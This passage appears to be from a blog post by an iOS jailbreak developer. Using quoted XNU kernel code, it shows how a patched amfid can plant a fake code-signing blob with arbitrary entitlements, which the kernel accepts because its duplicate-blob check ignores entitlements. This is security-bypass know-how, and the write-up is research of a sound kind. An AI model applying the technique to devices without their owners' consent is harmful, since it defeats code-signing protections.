<span class="k">if</span> <span class="p">(</span><span class="n">blob</span><span class="o">-></span><span class="n">csb_platform_binary</span><span class="p">)</span> <span class="p">{</span> <span class="c1">//platform binary needs to be the same for app slices</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">oblob</span><span class="o">-></span><span class="n">csb_platform_binary</span><span class="p">)</span> <span class="p">{</span>
<span class="n">vnode_unlock</span><span class="p">(</span><span class="n">vp</span><span class="p">);</span>
<span class="n">error</span> <span class="o">=</span> <span class="n">EALREADY</span><span class="p">;</span>
<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">blob</span><span class="o">-></span><span class="n">csb_teamid</span><span class="p">)</span> <span class="p">{</span> <span class="c1">//teamid binary needs to be the same for app slices</span>
<span class="k">if</span> <span class="p">(</span><span class="n">oblob</span><span class="o">-></span><span class="n">csb_platform_binary</span> <span class="o">||</span>
<span class="n">oblob</span><span class="o">-></span><span class="n">csb_teamid</span> <span class="o">==</span> <span class="nb">NULL</span> <span class="o">||</span>
<span class="n">strcmp</span><span class="p">(</span><span class="n">oblob</span><span class="o">-></span><span class="n">csb_teamid</span><span class="p">,</span> <span class="n">blob</span><span class="o">-></span><span class="n">csb_teamid</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">vnode_unlock</span><span class="p">(</span><span class="n">vp</span><span class="p">);</span>
<span class="n">error</span> <span class="o">=</span> <span class="n">EALREADY</span><span class="p">;</span>
<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="c1">// non teamid binary needs to be the same for app slices</span>
<span class="k">if</span> <span class="p">(</span><span class="n">oblob</span><span class="o">-></span><span class="n">csb_platform_binary</span> <span class="o">||</span>
<span class="n">oblob</span><span class="o">-></span><span class="n">csb_teamid</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
<span class="n">vnode_unlock</span><span class="p">(</span><span class="n">vp</span><span class="p">);</span>
<span class="n">error</span> <span class="o">=</span> <span class="n">EALREADY</span><span class="p">;</span>
<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>Now comes the interesting bit. The kernel calculates the offsets of the start and end of the blob based on the <code class="highlighter-rouge">oblob</code> (old blob) struct, and compares them against the newly generated blob to see if they conflict. If the location of the old blob resides within the same area as the new one, it’s marked as a <code class="highlighter-rouge">conflict !</code>. Then a few further checks take place: the start and end offsets, memory size, blob flags, and <code class="highlighter-rouge">csb_cdhash</code> must be equal, and the cputype must either be equal, or set to <code class="highlighter-rouge">CPU_TYPE_ANY</code> (-1) for either of the blobs.</p>
<p>Now, assuming this is all true, something incredible happens:</p>
<figure class="highlight"><pre><code class="language-text" data-lang="text">/*
* We already have this blob:
* we'll return success but
* throw away the new blob.
*/</code></pre></figure>
<p>What?!</p>
<p>The cputype of the old blob is updated, the return blob is <em>set to the old blob</em>, and a return code of <code class="highlighter-rouge">EAGAIN</code> is set before returning. Let’s take a look at how that’s handled:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="mi">3413</span> <span class="nf">if</span> <span class="p">(</span><span class="n">error</span> <span class="o">==</span> <span class="n">EAGAIN</span><span class="p">)</span> <span class="p">{</span>
<span class="mi">3414</span> <span class="cm">/*
3415 * See above: error is EAGAIN if we were asked
3416 * to add an existing blob again. We cleaned the new
3417 * blob and we want to **return success**.
3418 */</span>
<span class="mi">3419</span> <span class="n">error</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="mi">3420</span> <span class="p">}</span></code></pre></figure>
<p>Let’s summarise what happens here:</p>
<ul>
<li>A new blob starts to be created</li>
<li>AMFI (and therefore amfid) is called - but a blob is not currently present to modify</li>
<li>Some more un-important flags are set</li>
<li>The kernel loops through all pre-existing blobs in <code class="highlighter-rouge">vnode->ubc_info->cs_blob(->csb_next)</code> (if any)</li>
<li>Some basic checks are done to check for a ‘conflicting teamid’</li>
<li>The start and end offsets of the given old blob are calculated</li>
<li>The kernel checks for a conflict (overlap) between these blobs</li>
<li>If an overlap/conflict is detected, the new blob is <em>discarded</em>, and the kernel <em>returns success!</em></li>
</ul>
<p>This is perfect! If the kernel detects a pre-existing blob, <em>which we can generate from within the amfid patch</em>, the new blob will simply be thrown away, and the function will return success! Furthermore, although in this case there are some fairly strict conditions our faux-blob must coincide with (<code class="highlighter-rouge">csb_platform_binary</code> is set validly, the start/end offsets, memsize, csflags, and CDHash match up), the entitlements of the blob <em>are not checked</em>. This means our faux blob can contain any entitlement we might need, and the kernel simply uses them as if nothing is wrong! Perfect!</p>
<p>Let’s look at how this patch might work:</p>
<ul>
<li>amfid is called to, but <code class="highlighter-rouge">cs_blob</code> is not yet present</li>
<li>we use similar logic to the kernel, generating a faux <code class="highlighter-rouge">cs_blob</code>, with the addition of any entitlements we might need</li>
<li>this <code class="highlighter-rouge">cs_blob</code> passes all checks in place, and naturally overlaps with the existing blob</li>
<li>the kernel then discards the new blob, returning our faux blob</li>
<li>execution is continued and the binary is allowed to run</li>
</ul>
<p>Here is something important to note with this implementation: many properties of the blob must match up <strong>exactly</strong>. If any of the checks fail, this trick will not work. For example, if the faux blob has <code class="highlighter-rouge">csb_platform_binary</code> or <code class="highlighter-rouge">csb_teamid</code> set, and the kernel-generated blob does not, the preliminary checks starting on line 3256 will fail. This is also important for the checks on line 3288. Particularly, make sure the <code class="highlighter-rouge">csb_flags</code> match up. It first threw me as I had binaries with the <code class="highlighter-rouge">get-task-allow</code> entitlement on disk, but I was not updating the <code class="highlighter-rouge">csb_flags</code> with the <code class="highlighter-rouge">CS_GET_TASK_ALLOW</code> flag to match, causing these entitled binaries to not run. I simply added an exception here checking for the <code class="highlighter-rouge">get-task-allow</code> flag and updating <code class="highlighter-rouge">csb_flags</code> if present.</p>
<p>A nice trick: notice how the kernel doesn’t mind if you have <code class="highlighter-rouge">csb_cpu_type</code> set to -1 (<code class="highlighter-rouge">CPU_TYPE_ANY</code>). In this case, it will simply update your cpu_type with the one provided by the <code class="highlighter-rouge">load_code_signature</code> function. The less manual parsing the better, right?</p>
<p>In conclusion, although problems such as the requirement of certain entitlements do exist, it’s always worth playing around with the code responsible for causing this problem and see if there are any ways you can make it do certain operations in your favour. Many parts of the kernel aren’t designed with anti-jailbreak mechanisms or security in mind, especially considering many of these checks would simply be patched out in a typical kppbypass jailbreak. It may take quite a while for Apple to catch up with the tricks used by kppless, and I’m sure there will always be more present.</p>
<p>I would firstly like to thank <a href="https://twitter.com/stek29">@stek29</a> for coming up with the idea of patching entitlements in memory (although not this specific trick - neither of us initially realized this was an issue). I would also like to thank <a href="https://twitter.com/sbingner">@sbingner</a> for helping me work through this problem and spending hours upon hours scouring through kernel code and investigating other potential solutions to this problem. For questions, feel free to Tweet me and/or follow me <a href="https://twitter.com/ibsparkes">@iBSparkes</a>.</p>
<p>Cheers!</p>
<p>→ PsychoTea (Ben)</p>Under the hood of the iOS kernel, under AMFI and the Sandbox, lies codesigning. Codesigning validates whether code is allowed to run on an iOS device. If it isn’t signed by Apple - no worky. But if you have a jailbroken device, this restriction is removed - it’s one of the reasons we jailbreak. If you’ve ever used a jailbroken device, you would’ve experienced this without even realising it: you think Apple signed Cydia for us? (Hint: no).